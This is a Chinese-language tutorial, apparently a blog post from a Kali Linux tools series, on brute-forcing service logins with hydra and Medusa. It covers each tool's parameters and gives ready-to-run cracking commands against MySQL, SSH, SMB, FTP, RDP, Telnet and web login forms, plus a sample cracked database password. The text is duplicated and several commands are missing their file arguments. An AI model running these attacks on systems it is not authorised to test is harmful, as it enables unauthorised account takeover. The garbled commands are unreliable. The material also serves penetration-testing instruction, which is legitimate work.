2023年7月31日发(作者:)
渗透利器-kali⼯具(第六章-2)利⽤hydra暴⼒破解密码本⽂内容:hydra简介hydra安装配置hrdra破解Medusa
1,hydra简介: hydra的中⽂意思是就透彻,它是⼀款爆破神器,可以对多种服务的账号和密码进⾏爆破,包括Web登录、数据库、SSH、Ftp等服务。 ⽀持Linux、Windows、Mac平台安装,其中Kali Linux中⾃带hydra。 Hydra⽀持的服务有:POP3、SMB、RDP,SSH,FTP,POP3,Telnet,MYSQL…… 最⼤的安全漏洞之⼀是弱⼝令。2,hydra安装配置: Kali Linux中hydra⾃带。 Kali是安全从业⼈员常⽤的Linux系统,⾃带有⼤量安全⼯具,hydra⾃然也继承在⾥⾯。 ⼯具位置:密码攻击--在线攻击⼀栏 Windows中hydra安装:3,hydra破解: 相关参数: -l LOGIN 指定破解的⽤户名成,对特定⽤户破解 -L FILE 从⽂件中加载⽤户名进⾏破解。 -p PASS ⼩写p执⾏密码破解,少⽤,⼀般是采⽤密码字典。 -P FILE ⼤写字母P,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使⽤指定⽤户和密码[相同]试探。 -C FILE 使⽤冒号分隔格式,例如"登录:密码"来代替-L/-P参数。 -t TASKS 同时运⾏的链接的线程数,每⼀台主机默认为16 -M FILE 指定服务器⽬标列表⽂件⼀⾏⼀条。 -w TIME 设置最⼤超时的时间,单位秒,默认是30s。 -O FILE 指定结果输出⽂件。 -f 在使⽤-M参数以后,找到第⼀对登录名或者密码的时候终⽌破解。 -v/-V 显⽰详细过程。 -R 继续从上⼀次进度接着破解。 -S 采⽤SSL链接。 -s PORT 可通过这个参数指定⾮默认端⼝。 -U 服务模块使⽤细节 -h 更多的命令⾏选项[完成的帮助] server ⽬标服务器名称或者IP[使⽤这个或-M选项] service 指定服务名,⽀持的服务核协议telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icqsapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等 OPT ⼀些服务模块⽀持额外的输⼊[-U⽤于模块的帮助] 例如:[⽤法]: hydra -l user -P ftp://192.168.0.1 hydra -L -p defaultpw imap://192.168.0.1/PLAIN hydra -C -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L -P -M ssh ⽤法案例: 图形化界⾯:xhydra[推荐还是命令直接搞] 案例1: 破解Mysql密码 数据库⼀般会提供⼀个默认的账户,sql server的sa与⽤户,Mysql的root⽤户,Oracle的System⽤户等。 假如我们现在破解Mysql数据库: hydra -L -P ip mysql hydra -L -P mysql://⽬标ip:mysql端⼝号 如果需要将爆破的过程打印出来就加个指令-v hydra -L -P -v
mysql://⽬标ip:mysql端⼝号 成功后会打印类似如下的信息: [3306][mysql] host:ip login:sa password:sqladmin 案例2: 破解SSH: hydra -l ⽤户名 -P 密码字典 -t 线程 -v/V -e ns -f ip ssh hydra -l root -P /root/桌⾯/ -t 6 -V -e ns -f 192.168.62.129 ssh hydra -l ⽤户名 -P 密码字典 -t 线程 -o -vV -f ip ssh 命令详细: 攻击⽬标:192.168.62.128 使⽤的模块:ssh 爆破⽤户名:root (-1) 使⽤的密码字典:/root/ (-P) 爆破线程数:6 (-t) 显⽰详细信息 (-V) 爆破成功⼀个后提⽰(-f) 其他案例: s密码破解: hydra -l ⽤户名 -p 密码 smb://ip -vV
或者
hydra -l ⽤户名 -p 密码 smb ip –vV 2.破解Ftp: hydra ip ftp -l ⽤户名 -P 密码字典 -t 线程数(默认16) –vV 如果你发现⽬标ftp并不是在21端⼝,⽽是在其他端⼝上,可以使⽤-s参数指定正确的端⼝,其他服务同样如此 3.破解rdp: hydra ip rdp -l administrator -P –V 4.破解telnet: hydra ip telnet -l ⽤户 -P 密码字典 -t 32 -s 23 -e ns -f –V 5.破解HTTPS: hydra -m / -l muts -P ip https ⽅式提交,破解Web登录[不推荐,太过鸡肋]: hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/ ⽅式提交,破解Web登录[不⿁剑,太过鸡肋]: hydra -l ⽤户名 -P 密码字典 ip http-post-form"/admin/:username=^USER^&password=^PASS^&submit=login:sorry password" -V
的缺点: 1.稳定性差,程序时常崩溃。 2.速度控制不好,容易触发服务器屏蔽或锁死机制。 3.每主机新建进程,没服务新建实例。 4.⼤量⽬标破解时性能差。4,美杜莎-Medusa: 的特点: 1.稳定性好。 2.速度控制得当。 3.基于线程。 4.⽀持模块少于hydra[不⽀持rdp远程桌⾯] -Form⽀持存在缺陷 参数: -h [TEXT] ⽬标IP -H [FILE] ⽬标主机⽂件 -u [TEXT] ⽤户名 -U [FILE] ⽤户名⽂件 -p [TEXT] 密码 -P [FILE] 密码⽂件 -C [FILE] 组合条⽬⽂件 -O [FILE] ⽂件⽇志信息[保存扫描结果] -e [n/s/nsN意为空密码,S意为密码与⽤户名相同 -M [TEXT] 模块执⾏名称 -m [TEXT] 传递参数到模块 -d 显⽰所有的模块名称 -n [NUM] 使⽤⾮默认端⼝ -s 启⽤SSL -r [NUM] 重试间隔时间,默认为3秒 -t [NUM] 设定线程数量 -L 并⾏化,每个⽤户使⽤⼀个线程 -f 在任何主机上找到第⼀个账号/密码后,停⽌破解 -q 显⽰模块的使⽤信息 -v [NUM] 详细级别(0-6) -w [NUM] 错误调试级别(0-10) -V 显⽰版本 -Z [TEXT] 继续扫描上⼀次 使⽤: 1.使⽤语法: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] 2.破解MSSQL: medusa -h ip -u root -P / -t 5 -f -M mssql 3.破解ssh: medusa -M ssh -H -U -p password 4.输出⽇志⽂件: medusa -h ip -u sa -P / -t 5 -f -e ns -M mssql -O /
2023年7月31日发(作者:)
渗透利器-kali⼯具(第六章-2)利⽤hydra暴⼒破解密码本⽂内容:hydra简介hydra安装配置hrdra破解Medusa
1,hydra简介: hydra的中⽂意思是就透彻,它是⼀款爆破神器,可以对多种服务的账号和密码进⾏爆破,包括Web登录、数据库、SSH、Ftp等服务。 ⽀持Linux、Windows、Mac平台安装,其中Kali Linux中⾃带hydra。 Hydra⽀持的服务有:POP3、SMB、RDP,SSH,FTP,POP3,Telnet,MYSQL…… 最⼤的安全漏洞之⼀是弱⼝令。2,hydra安装配置: Kali Linux中hydra⾃带。 Kali是安全从业⼈员常⽤的Linux系统,⾃带有⼤量安全⼯具,hydra⾃然也继承在⾥⾯。 ⼯具位置:密码攻击--在线攻击⼀栏 Windows中hydra安装:3,hydra破解: 相关参数: -l LOGIN 指定破解的⽤户名成,对特定⽤户破解 -L FILE 从⽂件中加载⽤户名进⾏破解。 -p PASS ⼩写p执⾏密码破解,少⽤,⼀般是采⽤密码字典。 -P FILE ⼤写字母P,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使⽤指定⽤户和密码[相同]试探。 -C FILE 使⽤冒号分隔格式,例如"登录:密码"来代替-L/-P参数。 -t TASKS 同时运⾏的链接的线程数,每⼀台主机默认为16 -M FILE 指定服务器⽬标列表⽂件⼀⾏⼀条。 -w TIME 设置最⼤超时的时间,单位秒,默认是30s。 -O FILE 指定结果输出⽂件。 -f 在使⽤-M参数以后,找到第⼀对登录名或者密码的时候终⽌破解。 -v/-V 显⽰详细过程。 -R 继续从上⼀次进度接着破解。 -S 采⽤SSL链接。 -s PORT 可通过这个参数指定⾮默认端⼝。 -U 服务模块使⽤细节 -h 更多的命令⾏选项[完成的帮助] server ⽬标服务器名称或者IP[使⽤这个或-M选项] service 指定服务名,⽀持的服务核协议telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icqsapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等 OPT ⼀些服务模块⽀持额外的输⼊[-U⽤于模块的帮助] 例如:[⽤法]: hydra -l user -P ftp://192.168.0.1 hydra -L -p defaultpw imap://192.168.0.1/PLAIN hydra -C -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L -P -M ssh ⽤法案例: 图形化界⾯:xhydra[推荐还是命令直接搞] 案例1: 破解Mysql密码 数据库⼀般会提供⼀个默认的账户,sql server的sa与⽤户,Mysql的root⽤户,Oracle的System⽤户等。 假如我们现在破解Mysql数据库: hydra -L -P ip mysql hydra -L -P mysql://⽬标ip:mysql端⼝号 如果需要将爆破的过程打印出来就加个指令-v hydra -L -P -v
mysql://⽬标ip:mysql端⼝号 成功后会打印类似如下的信息: [3306][mysql] host:ip login:sa password:sqladmin 案例2: 破解SSH: hydra -l ⽤户名 -P 密码字典 -t 线程 -v/V -e ns -f ip ssh hydra -l root -P /root/桌⾯/ -t 6 -V -e ns -f 192.168.62.129 ssh hydra -l ⽤户名 -P 密码字典 -t 线程 -o -vV -f ip ssh 命令详细: 攻击⽬标:192.168.62.128 使⽤的模块:ssh 爆破⽤户名:root (-1) 使⽤的密码字典:/root/ (-P) 爆破线程数:6 (-t) 显⽰详细信息 (-V) 爆破成功⼀个后提⽰(-f) 其他案例: s密码破解: hydra -l ⽤户名 -p 密码 smb://ip -vV
或者
hydra -l ⽤户名 -p 密码 smb ip –vV 2.破解Ftp: hydra ip ftp -l ⽤户名 -P 密码字典 -t 线程数(默认16) –vV 如果你发现⽬标ftp并不是在21端⼝,⽽是在其他端⼝上,可以使⽤-s参数指定正确的端⼝,其他服务同样如此 3.破解rdp: hydra ip rdp -l administrator -P –V 4.破解telnet: hydra ip telnet -l ⽤户 -P 密码字典 -t 32 -s 23 -e ns -f –V 5.破解HTTPS: hydra -m / -l muts -P ip https ⽅式提交,破解Web登录[不推荐,太过鸡肋]: hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/ ⽅式提交,破解Web登录[不⿁剑,太过鸡肋]: hydra -l ⽤户名 -P 密码字典 ip http-post-form"/admin/:username=^USER^&password=^PASS^&submit=login:sorry password" -V
的缺点: 1.稳定性差,程序时常崩溃。 2.速度控制不好,容易触发服务器屏蔽或锁死机制。 3.每主机新建进程,没服务新建实例。 4.⼤量⽬标破解时性能差。4,美杜莎-Medusa: 的特点: 1.稳定性好。 2.速度控制得当。 3.基于线程。 4.⽀持模块少于hydra[不⽀持rdp远程桌⾯] -Form⽀持存在缺陷 参数: -h [TEXT] ⽬标IP -H [FILE] ⽬标主机⽂件 -u [TEXT] ⽤户名 -U [FILE] ⽤户名⽂件 -p [TEXT] 密码 -P [FILE] 密码⽂件 -C [FILE] 组合条⽬⽂件 -O [FILE] ⽂件⽇志信息[保存扫描结果] -e [n/s/nsN意为空密码,S意为密码与⽤户名相同 -M [TEXT] 模块执⾏名称 -m [TEXT] 传递参数到模块 -d 显⽰所有的模块名称 -n [NUM] 使⽤⾮默认端⼝ -s 启⽤SSL -r [NUM] 重试间隔时间,默认为3秒 -t [NUM] 设定线程数量 -L 并⾏化,每个⽤户使⽤⼀个线程 -f 在任何主机上找到第⼀个账号/密码后,停⽌破解 -q 显⽰模块的使⽤信息 -v [NUM] 详细级别(0-6) -w [NUM] 错误调试级别(0-10) -V 显⽰版本 -Z [TEXT] 继续扫描上⼀次 使⽤: 1.使⽤语法: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] 2.破解MSSQL: medusa -h ip -u root -P / -t 5 -f -M mssql 3.破解ssh: medusa -M ssh -H -U -p password 4.输出⽇志⽂件: medusa -h ip -u sa -P / -t 5 -f -e ns -M mssql -O /
发布评论